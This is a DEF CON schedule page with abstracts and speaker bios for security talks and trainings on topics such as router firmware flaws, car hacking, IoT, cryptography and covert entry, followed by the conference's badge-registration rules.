Modern SOCs are flooded with alerts yet blind to what matters. This talk shows how to auto-discover attack flows and root causes by hacking context across telemetry, logs, and threat signals. Using open-source tools and correlation logic, we’ll walk through real-world detection pipelines that stitch together events across cloud, endpoint, and network environments. You'll learn lightweight, vendor-agnostic approaches to enrich data, group alerts by incident, and make sense of security chaos — fast.
SpeakerBio: Ezz TahounEzz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
- ics Calendar file
Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.
During the course you will:
Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.
This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.
No prior knowledge required!
Learning Objectives
- ics Calendar file
Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.
During the course you will:
Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.
This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.
No prior knowledge required!
Learning Objectives
- ics Calendar file
Cryptocurrency exchanges have the reputation of keeping 'not your keys so not your coins', but we analyze further to understand what technology powers them and which security aspects serve users. In this hour we use tools like Helloex and Octobot to build our own experimental testnet exchange. Your team divides into exchange providers maintaining stability and opportunistic traders taking advantage of system loopholes. A group discussion finally concludes under which conditions cryptocurrency exchanges provide security and value.
Speakers:Sky Gul,Andrea
- ics Calendar file
This research examines security oversights in a range of modern 4G/5G routers used in small businesses, industrial IoT, and everyday mobile deployments. Several of these routers contain vulnerabilities reminiscent of older security flaws, such as weak default credentials, inadequate authentication checks, and command injection pathways. By reverse-engineering firmware and testing for insecure endpoints, it was possible to demonstrate remote code execution, arbitrary SMS sending, and other serious exploits affecting Tuoshi and KuWFi devices.
Through practical examples, including Burp Suite requests and Ghidra disassembly, the talk highlights how these weaknesses can grant attackers root access, allow fraudulent activity, or compromise entire networks. In each case, mitigation strategies and best practices—like robust authentication, regular firmware updates, and network segmentation—are emphasized. Ultimately, this presentation underscores the importance of continuous security scrutiny, even for modern hardware, and encourages the community to stay vigilant and collaborate in uncovering and addressing such pervasive vulnerabilities.
References:
Edward Warren is an Information Security Analyst and Independent Security Researcher specializing in IoT and mobile application security. Over the past few years he has discovered critical (CVSS) 0-day vulnerabilities. Edward also earned a Hall of Fame acknowledgement from the Google Play Security Reward Program (GPSRP) and attribution in numerous CVE publications. He has presented his work at conferences such as BSides and ShmooCon. When not tracking down digital bugs, Edward can be found hiking rugged trails or exploring the seas through his newfound fascination for scuba diving.
- ics Calendar file
This course is a 100% hands-on deep dive into the OWASP Security Testing Guide and relevant items of the OWASP Application Security Verification Standard (ASVS), so this course covers and goes beyond the OWASP Top Ten.
Long are the days since web servers were run by perl scripts apps written in Delphi. What is common between Walmart, eBay, PayPal, Microsoft, LinkedIn, Google and Netflix? They all use Node.js: JavaScript on the server.
Modern Web apps share traditional attack vectors and also introduce new opportunities to threat actors. This course will teach you how to review modern web apps, showcasing Node.js but using techniques that will also work against any other web app platform. Ideal for Penetration Testers, Web app Developers as well as everybody interested in JavaScript/Node.js and Modern app stack security.
Get a FREE taste for this training, including access to video recording, slides and vulnerable apps to play with:
1 hour workshop - https://7asecurity.com/free-workshop-web-apps
All action, no fluff, improve your security analysis workflow and immediately apply these gained skills in your workplace, packed with exercises, extra mile challenges and CTF, self-paced and suitable for all skill levels, with continued education via unlimited email support, lifetime access, step-by-step video recordings and interesting apps to practice, including all future updates for free.
Speakers:Abraham Aranguren,Anirudh Anand,Ashwin ShenoiAfter 17 years in itsec and 24 in IT, Abraham Aranguren is now the CEO of 7ASecurity (7asecurity.com), a company specializing in penetration testing of web/mobile apps, infrastructure, code reviews and training. Co-Author of the Mobile, Web and Desktop (Electron) app 7ASecurity courses. Security Trainer at Blackhat USA, HITB, OWASP Global AppSec and many other events. OWASP OWTF project leader, an OWASP flagship project (owtf.org), Major degree and Diploma in Computer Science, some certs: CISSP, OSCP, GWEB, OSWP, CPTS, CEH, MCSE:Security, MCSA:Security, Security+. As a shell scripting fan trained by unix dinosaurs, Abraham wears a proud manly beard. He writes on Twitter as @7asecurity @7a_ @owtfp or https://7asecurity.com/blog. Multiple presentations, pentest reports and recordings can be found at https://7asecurity.com/publications.
SpeakerBio: Anirudh AnandAnirudh Anand is a security researcher with a primary focus on Web and Mobile Application Security. He is currently working as a Principal Security Engineer at CRED and also Security Trainer at 7asecurity. He has been submitting bugs and contributing to security tools for over 9 years. In his free time, he participates in CTF competitions along with Team bi0s (#1 security team in India according to CTFtime). His bounties involve vulnerabilities in Google, Microsoft, LinkedIn, Zendesk, Sendgrid, Gitlab, Gratipay and Flipboard.
Anirudh is an open source enthusiast and has contributed to several OWASP projects with notable contributions being in OWTF and Hackademic Challenges Project. He has presented/trained in a multitude of conferences including BlackHat US 2020, OWASP NZ 2021, HackFest CA 2021, c0c0n 2019, BlackHat Arsenal 2019, BlackHat Europe Arsenal 2018, HITB Dubai 2018, Offzone Moscow 2018, Ground Zero Summit Delhi 2015 and Xorconf 2015.
SpeakerBio: Ashwin ShenoiAshwin Shenoi is an avid application security enthusiast who currently works as a Senior Security Engineer at CRED and likes to break into applications and automate stuff. He is part of team bi0s, the top ranked CTF team according to CTFTime. He heads the Web Security team at team bi0s and is also the core challenge setter and organiser of the various editions of InCTF and the other CTFs organised by team bi0s. He has also presented talks in various security meet-ups and conferences including BlackHat Asia and BlackHat USA. He does a fair share of breaking into open source applications services and has also been awarded several CVEs for the same.
- ics Calendar file
This course is a 100% hands-on deep dive into the OWASP Security Testing Guide and relevant items of the OWASP Application Security Verification Standard (ASVS), so this course covers and goes beyond the OWASP Top Ten.
Long are the days since web servers were run by perl scripts apps written in Delphi. What is common between Walmart, eBay, PayPal, Microsoft, LinkedIn, Google and Netflix? They all use Node.js: JavaScript on the server.
Modern Web apps share traditional attack vectors and also introduce new opportunities to threat actors. This course will teach you how to review modern web apps, showcasing Node.js but using techniques that will also work against any other web app platform. Ideal for Penetration Testers, Web app Developers as well as everybody interested in JavaScript/Node.js and Modern app stack security.
Get a FREE taste for this training, including access to video recording, slides and vulnerable apps to play with:
1 hour workshop - https://7asecurity.com/free-workshop-web-apps
All action, no fluff, improve your security analysis workflow and immediately apply these gained skills in your workplace, packed with exercises, extra mile challenges and CTF, self-paced and suitable for all skill levels, with continued education via unlimited email support, lifetime access, step-by-step video recordings and interesting apps to practice, including all future updates for free.
Speakers:Abraham Aranguren,Anirudh Anand,Ashwin ShenoiAfter 17 years in itsec and 24 in IT, Abraham Aranguren is now the CEO of 7ASecurity (7asecurity.com), a company specializing in penetration testing of web/mobile apps, infrastructure, code reviews and training. Co-Author of the Mobile, Web and Desktop (Electron) app 7ASecurity courses. Security Trainer at Blackhat USA, HITB, OWASP Global AppSec and many other events. OWASP OWTF project leader, an OWASP flagship project (owtf.org), Major degree and Diploma in Computer Science, some certs: CISSP, OSCP, GWEB, OSWP, CPTS, CEH, MCSE:Security, MCSA:Security, Security+. As a shell scripting fan trained by unix dinosaurs, Abraham wears a proud manly beard. He writes on Twitter as @7asecurity @7a_ @owtfp or https://7asecurity.com/blog. Multiple presentations, pentest reports and recordings can be found at https://7asecurity.com/publications.
SpeakerBio: Anirudh AnandAnirudh Anand is a security researcher with a primary focus on Web and Mobile Application Security. He is currently working as a Principal Security Engineer at CRED and also Security Trainer at 7asecurity. He has been submitting bugs and contributing to security tools for over 9 years. In his free time, he participates in CTF competitions along with Team bi0s (#1 security team in India according to CTFtime). His bounties involve vulnerabilities in Google, Microsoft, LinkedIn, Zendesk, Sendgrid, Gitlab, Gratipay and Flipboard.
Anirudh is an open source enthusiast and has contributed to several OWASP projects with notable contributions being in OWTF and Hackademic Challenges Project. He has presented/trained in a multitude of conferences including BlackHat US 2020, OWASP NZ 2021, HackFest CA 2021, c0c0n 2019, BlackHat Arsenal 2019, BlackHat Europe Arsenal 2018, HITB Dubai 2018, Offzone Moscow 2018, Ground Zero Summit Delhi 2015 and Xorconf 2015.
SpeakerBio: Ashwin ShenoiAshwin Shenoi is an avid application security enthusiast who currently works as a Senior Security Engineer at CRED and likes to break into applications and automate stuff. He is part of team bi0s, the top ranked CTF team according to CTFTime. He heads the Web Security team at team bi0s and is also the core challenge setter and organiser of the various editions of InCTF and the other CTFs organised by team bi0s. He has also presented talks in various security meet-ups and conferences including BlackHat Asia and BlackHat USA. He does a fair share of breaking into open source applications services and has also been awarded several CVEs for the same.
- ics Calendar file
Drawing from personal experience as a press photographer, this talk highlights the underexplored attack surface created by media access at high profile events like concerts, sporting events and political rallies. We explore how the press badge can become a powerful tool in the hands of a red teamer. By taking into account elements of OSINT, social engineering, and physical and network security, we focus on how lessons learned as a press photographer can directly be applied by red teamers (or threat actors!) to gain a foothold. Once that is achieved, individuals can embed themselves directly within high-visibility individuals and high-value, sensitive devices associated with professional sports teams, musicians and bands, and political leaders and lawmakers. The talk also discusses the importance of looking at the ‘bigger picture’, and being aware of threats where people may not consider them to come from. Inspired by the spirit of Johnny Long’s No Tech Hacking, this talk examines how low-tech, high-ingenuity approaches continue to be in a hacker's arsenal. It makes the case that media impersonation is a serious but overlooked threat vector, and one that allows attackers to bypass traditional perimeters.
Speakers:Mansoor Ahmad,Brad AmmermanMansoor Ahmad is an offensive security practitioner who has always had a curiosity about how things worked. He studied information technology and worked as a news photographer in college. A quiet kid growing up in a foreign country, he would always accompany his father on errands and observe people's reactions to different things and the psychology behind it. This started an itch which he has been scratching since then, that has led to a career in information security. When he's not working, eating or sleeping, Mansoor likes to practice photography and taking naps.
SpeakerBio: Brad AmmermanBrad Ammerman, a leading figure in security testing, currently serves as the Senior Director at Prescient Security. His background includes influential roles at companies like Foresite, Optiv Security, Lockheed Martin, DIA, DoD, and Supreme Court of Nevada, where he developed his expertise in offensive security and team management. A skilled hacker himself, Brad is also a recognized speaker, educator, mentor, and disabled veteran, dedicated to teaching and protecting others. He takes great pride in his roles as a devoted husband and father.
- ics Calendar file
In today's bug bounty landscape, advantage goes to those who can see what others miss. The OWASP Amass Project has long equipped researchers with powerful tools for internet asset discovery, but its newest addition—assoc—takes things to the next level. This talk introduces assoc, a tool that allows hunters to explore the Open Asset Model through custom association triples, a concept inspired by RDF triples used in knowledge graphs. These user-defined relationships enable highly targeted queries across a rich graph of internet data, revealing non-obvious associations between domains, IP addresses, certificates, and legal entities.
SpeakerBio: Jeff "caffix" Foley, Founder & Project Leader, OWASP AMASS at OWASPJeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.
- ics Calendar file
There is a creature that lives inside our smartphones, laptops, and PCs, quietly driving their most cutting-edge behaviors. Much larger versions of it hide in datacenters around the world, constantly crunching through massive computation problems. And yet, even experienced engineers find it mysterious. Originally made to boost graphics performance, it has evolved into the engine that powers technologies behind systems like Claude and ChatGPT. In this workshop, we will uncover the nature of this creature: the GPU. Starting with its history and evolution, we will explore how a processor meant to accelerate 3D graphics became the driving force behind modern machine learning and AI. Along the way, we will dive into the design and behavior of neural networks, and discover how a machine built for graphics rendering learned to interpret images and speak human language. Finally, we will investigate how the complexity of neural networks made possible by GPUs can lead to unexpected and strange behaviors... some of which may not be accidental.
SpeakerBio: eigentouristEigentourist is a programmer who learned the craft in the early 1980s. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it's hard to tell which was which. Today, he works on systems integration and engineering in the healthcare industry.
- ics Calendar file
We're going to explore how OBD-II emissions testing works and how you might go about convincing the scanner that everything is fine.
References:
SpeakerBio: ArchwispLong-time tech nerd, car enthusiast, and hardware hacker
- ics Calendar file
As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.
Participants will learn:
Kamel Ghali is an 8 year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.
- ics Calendar file
As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.
Participants will learn:
Kamel Ghali is an 8 year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.
- ics Calendar file
What threats are hidden in network traffic? In this hands-on course, we’ll show you how to spot malicious activity hiding in plain sight. Learn how to filter noise, detect C2 traffic, and uncover stealthy attacks using real-world packet captures. Whether you're into blue teaming, incident response, or just love dissecting packets, this session will sharpen your network forensics skills!
SpeakerBio: Chris Greer, Packet AnalystChris is a Packet Analyst at Packet Pioneer, specializing in network performance analysis and forensics using Wireshark. Whether he's investigating complex issues at the packet level or leading hands-on training sessions, Chris is passionate about helping others master the art of packet analysis.
As a certified instructor and active contributor to the Wireshark Foundation, he regularly teaches interactive Wireshark courses for audiences of all sizes. Chris also shares bite-sized tips, analysis techniques, and troubleshooting strategies on his YouTube channel—making network forensics more accessible to analysts at every level.
- ics Calendar file
Origins of Hard Hat Brigade (why), the who / what / how
Speakers:MrBill,M0nkeyDrag0n,Hydrox,CoD_Segfault
- ics Calendar file
This comprehensive course is designed for developers and cybersecurity professionals seeking to harness the power of Generative AI and Large Language Models (LLMs) to enhance software security and development practices. Participants will gain a deep understanding of LLM functionality, strengths, and weaknesses, and learn to craft effective prompts for diverse use cases. The curriculum covers essential topics such as embeddings, vector stores, and Langchain, offering insights into document loading, code analysis, and custom tool creation using Agent Executors.
Course highlights:
Seth utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
SpeakerBio: Ken Johnson, Co-Founder and CTO at DryRun SecurityKen utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
- ics Calendar file
This comprehensive course is designed for developers and cybersecurity professionals seeking to harness the power of Generative AI and Large Language Models (LLMs) to enhance software security and development practices. Participants will gain a deep understanding of LLM functionality, strengths, and weaknesses, and learn to craft effective prompts for diverse use cases. The curriculum covers essential topics such as embeddings, vector stores, and Langchain, offering insights into document loading, code analysis, and custom tool creation using Agent Executors.
Course highlights:
Seth utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
SpeakerBio: Ken Johnson, Co-Founder and CTO at DryRun SecurityKen utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
- ics Calendar file
Have I Been Ransomed? is a specialized security service, akin to Have I Been Pwned, designed to detect personal data exposure specifically from ransomware leaks. As ransomware attacks increasingly involve data theft and public dumping, individuals need a way to check if their personally identifiable information has been compromised. Our platform goes beyond standard database checks by processing a wide array of leaked file types, including PDFs, documents, and text files. We employ advanced optical character recognition coupled with sophisticated large language models to meticulously scan unstructured data and extract sensitive identifiers such as national ID cards, driver’s licenses, and social security numbers. Have I Been Ransomed? provides critical awareness, empowering users to discover if their sensitive information has been exposed in a ransomware incident and enabling them to take proactive steps against potential identity theft and fraud.
SpeakerBio: Juanma "M4C" TejadaJuanma is a telecommunications engineer with a profound passion for drone technology and the complexities of hacking. His journey into the cybersecurity realm began unconventionally. Initial explorations through various online forums, driven by early curiosities, unexpectedly ignited a deep interest in the mechanics of data leaks, system breaches, and the evolving tactics of ransomware groups. This non-traditional path provided firsthand exposure to the cyber underground, equipping him with practical, real-world insights into attacker motivations and methodologies. This unique background grants him a grounded perspective, making him well-qualified to discuss the practical applications and implications within the current cybersecurity landscape.
- ics Calendar file
In this talk, we dive into a world of webcams that secretly run Linux. What started as a casual curiosity turned into a deep dive into embedded Linux systems, obscure supply chains, and alarming security oversights.
Along the way, we discovered how decisions made far upstream – by silicon vendors and OEMs – can introduce vulnerabilities that quietly ship in tens of thousands of devices.
This presentation explores the broader implications of insecure firmware, broken update mechanisms, and the surprising autonomy of devices many assume to be simple peripherals.
We share how we traced the tech stack from brand-name distributors back to little-known chipset manufacturers, and what that journey revealed about responsibility, transparency, and the risks of neglecting security at the hardware-software boundary.
Come for curiosity, stay for the demos and laughs.
Speakers:Mickey Shkatov,Jesse MichaelMickey has been involved in security research for over a decade, specializing in breaking down complex concepts and identifying security vulnerabilities in unusual places. His experience spans a variety of topics, which he has presented at security conferences worldwide. His talks have covered areas ranging from web penetration testing to the intricacies of BIOS firmware.
SpeakerBio: Jesse MichaelJesse is an experienced security researcher focused on vulnerability detection and mitigation who has worked at all layers of modern computing environments from exploiting worldwide corporate network infrastructure down to hunting vulnerabilities inside processors at the hardware design level. His primary areas of expertise include reverse engineering embedded firmware and exploit development. He has also presented research at DEF CON, Black Hat, PacSec, Hackito Ergo Sum, Ekoparty, and BSides Portland.
- ics Calendar file
As digital systems increasingly control the world’s most powerful machines, software failures have become a silent but deadly threat—sometimes with fatal consequences. This DEFCON presentation dives deep into maritime and military incidents where software errors, automation missteps, and human-computer interface flaws have led to catastrophic outcomes. Reviewing the USS Yorktown’s infamous “Smart Ship” crash and the USS Vincennes’ tragic misidentification of a civilian airliner, we dissect how code, configuration, and design choices can escalate into life-or-death situations at sea. We’ll also draw parallels to high-profile aviation incidents like the Boeing 737 Max and F-35, illustrating common threads in software assurance failures across domains. We’ll walk through how a subtle software flaw could be exploited to disrupt critical vessel operations, and what this means for the future of maritime cybersecurity. Attendees will gain insight into the technical, organizational, and ethical challenges of securing mission-critical systems, and leave with practical takeaways for hackers, engineers, and policymakers seeking to prevent the next digital disaster on the high seas.
Speakers:Michael DeVolld,Austin ReidWith 25 years of experience in the maritime sector, Michael is dedicated to ensuring the safety and security of the global Maritime Transportation System (MTS). A retired US Coast Guard Officer, he has conducted numerous safety and compliance inspections, investigated high-profile marine casualties, and established a cybersecurity program at USCG Cyber Command. Previously, as a Business Information Security Officer for Royal Caribbean Group, Michael developed strategies to maintain the cybersecurity and regulatory compliance of the company's global cruise fleet. Holding a B.S. in Computer Science and an M.S. in Telecommunications, he currently serves as ABS Consulting's Maritime Cybersecurity Director. In this role, he specializes in managing cyber risks, implementing technical solutions, shaping policy and governance, providing expert advisory services, and designing custom solutions to meet maritime regulatory requirements and best practices.
SpeakerBio: Austin Reid, ABS GroupAustin Reid is a senior consultant at ABS Consulting specializing in securing maritime operational technology with 10 years experience in the Maritime sector from breakbulk, automated container terminal ops, and securing critical vessel systems for all types of ships. He is also a hacker, and security researcher specializing in maritime navigation control systems.
- ics Calendar file
Welcome to the “fun” world of IoT, where security is often an afterthought and vulnerabilities lurk around every corner. This presentation is a guide for vendors on what not to do when designing IoT devices and a survival manual for users to spot insecure gadgets.
Ever wondered if your IoT device is spilling your home WiFi secrets to the cloud over HTTP? Spoiler alert: maybe :)
Pairing your device over open WiFi and HTTP while providing your home WiFi credentials? Just to vacuum clean your home?
How about IoT devices lying about their Android version? But don’t worry, it already comes with malware pre-infected.
Wouldn’t it be nice to access the clear-text admin passwords before authentication? How about multiple different ways to do that?
Would you like to see reverse engineering an N-day command injection vulnerability in the login form of a popular NAS device?
What could be the easiest way to figure out the (static) AES encryption key for a home security alarm solution? Just RTFM!
Why bother with memory corruption when command injection is still the king of IoT threats? I'll break it down for you, with an analysis of challenges with scalable IoT memory corruption exploits, and the challenges with blind ROP.
Last but not least, let’s discuss why Busybox is “not the best” choice for IoT development.
Zoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.
I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.
- ics Calendar file
"How NOT to Perform a Covert Entry Assessment" is a no B.S. discussion that covers what not to do during covert entry engagements--highlighting real-world mistakes, busted Hollywood myths, and missteps that compromise success. We’ll walk through effective techniques for physical site surveys, face-to-face social engineering, and real-time troubleshooting when things go sideways. Attendees will be encouraged to share experiences and lessons learned in an open, interactive format. We’ll also demo our covert entry tools, and discuss how to deliver reliable results to both commercial and high-security government clients.
Speakers:Brent White,Tim RobertsBrent is a Sr. Principal Security Consultant / Covert Entry Specialist with Dark Wolf Solutions, specializing in social engineering and Red Team-style security assessments for both commercial and Department of Defense clients, as well as his contributions towards the development the drone hacking methodology for the Defense Innovation Unit's "Blue sUAS" initiative. He also served as a trusted adviser for the TN Dept of Safety and Homeland Security on the topic of physical and cyber security and has held the role of Web/Project Manager and IT Security Director for a global franchise company as well as Web Manager and information security positions for multiple TV personalities.
He has also been interviewed on the popular web series, “Hak5” with Darren Kitchen, Security Weekly, BBC News, featured with Tim Roberts on the popular series "ProfilingEvil" by Mike King, and on Microsoft’s “Roadtrip Nation” television series. His experience includes Internal/External Penetration, Network evasion, Wireless, Web Application, Drone and Physical Security assessments, and Social Engineering.
Brent has also spoken at numerous security conferences, including ISSA International, DEF CON, Black Hat, DerbyCon, multiple "B-Sides" conference events, Appalachian Institute of Digital Evidence conference at Marshall University, and many more.
SpeakerBio: Tim Roberts, WeHackPeople.com / Dark Wolf SolutionsTim is a Covert Entry Specialist with Dark Wolf Solutions and Sr. Principal Penetration Tester. He is the founding member of the Lexington DEF CON group (DC859). He has been interviewed on the subject of “White hat hacking” for Microsoft’s “Roadtrip Nation” television series, was featured on IDG Enterprise’s CSO Online publication by Ryan Francis on social engineering, and was interviewed at Black Hat by HelpNetSecurity on security awareness and “Know Your Adversary”. He and Brent White have also been featured a couple of times on the true crime series Profiling Evil with Mike King.
Tim has over fifteen years of professional security experience and has held management, IT, and physical security roles across multiple industries, including healthcare, finance, and government. His experience includes Red Team, Internal/External Network, Wireless, Application, Physical Security, Social Engineering, and more.
Tim has spoken and conducted training at numerous security and hacker conferences, including ISSA International, DEF CON, DerbyCon, NolaCon, various B-Sides, CircleCityCon, Techno Security Con, SaintCon, Appalachian Institute of Digital Evidence at Marshall University, Who’s Your Hacker, was keynote for the S&H Law – FBI/Hacker Panel, and more. By continuing to share these experiences, he hopes to further contribute to the InfoSec community and security awareness as a whole.
- ics Calendar file
Security research has been focused on securing well-known, widely replicated ecosystems where problems and solutions are shared across the industry. But what happens when you build something no one else has? How do you secure an architecture that's both proprietary and deployed at billion-core scale?
In 2016, NVIDIA began transitioning its internal Falcon microprocessor, used in nearly all GPU products, to a RISC-V based architecture. Today, each chipset has 10-40 cores, and in 2024, NVIDIA surpassed 1 billion RISC-V cores shipped. This success came with unique security challenges, ones that existing models couldn't solve.
To address them, we created a custom SW and HW security architecture from scratch. Including a purpose-built Separation Kernel SW, novel RISC-V ISA extensions like Pointer Masking, IOPMP (later ratified), and unique secure boot and attestation solution. But how do you future-proof a proprietary ecosystem against tomorrow's threats?
In this talk, we'll share what we learned, and what's next. From HW-assisted memory safety (HWASAN, MTE) to control-flow integrity (CFI) and CHERI-like models, we'll explore how NVIDIA is preparing not only its RISC-V ecosystem for the evolving threat landscape. If you care about real-world security at an unprecedented scale, this is a journey you won't want to miss.
References:
Adam ‘pi3’ Zabrocki is a Director of Offensive Security at NVIDIA and specializes in low-level security research. He created Linux Kernel Runtime Guard (LKRG) project defended by Openwall and has worked in Microsoft, European Organization for Nuclear Research (CERN), HISPASEC Sistemas (virustotal.com), Wroclaw Center for Networking and Supercomputing, Cigital and more. Adam has contributed to numerous projects, found vulnerabilities in various systems (including Hyper-V, KVM, RISC-V ISA, Intel's Reference Code, Intel/NVIDIA vGPU, Linux kernel, FreeBSD, OpenSSH, gcc SSP/ProPolice, Apache), and published research in Phrack Magazine. He serves as Vice-Chair of the RISC-V J-extension group and has developed key security extensions for RISC-V (Pointer Masking/HWASAN, Control Flow Integrity) currently working on Memory Tagging. Coauthor of a Windows Internals and twice nominated for The Pwnie Awards, he has spoken at major security conferences like Blackhat and DEF CON, Security BSides, more
SpeakerBio: Marko MiticMarko is a Software Security Architect and System Software Manager focused on secure system design and product security, currently managing NVIDIA’s Core RISC-V team. For the past 10 years at NVIDIA he worked on designing key security aspects for the core system software architecture and drove offensive security practices for GPU system software. He was Security and Risk Officer and PSIRT lead responsible for driving and tracking PSIRT issues and developing remediation plans. In the recent years, his focus was RISC-V, where he has been driving NVIDIA’s RISCV security architecture and implementation, bringing NVRISCV TEE to fruition in shipping NVIDIA products. Motivated by incident response experience, he now passionately leads the adoption of Ada/SPARK, formally verifiable programming language, as powerful tools for reducing security risks in NVIDIA’s most critical software components.
- ics Calendar file
Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.
A badge is required for each human age 8 and older.
You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.
Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)
Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.
Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.
You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked-up on-site -- they will not be mailed or shipped.
We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.
If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.
Online purchases are provided a receipt via email when the purchase is made.
Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.
Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.
There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.
We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.
If you attend BlackHat, it is possible to purchase a DEF CON badge with your BlackHat registration. If you did so, please get your DEF CON badge from BlackHat before they close.
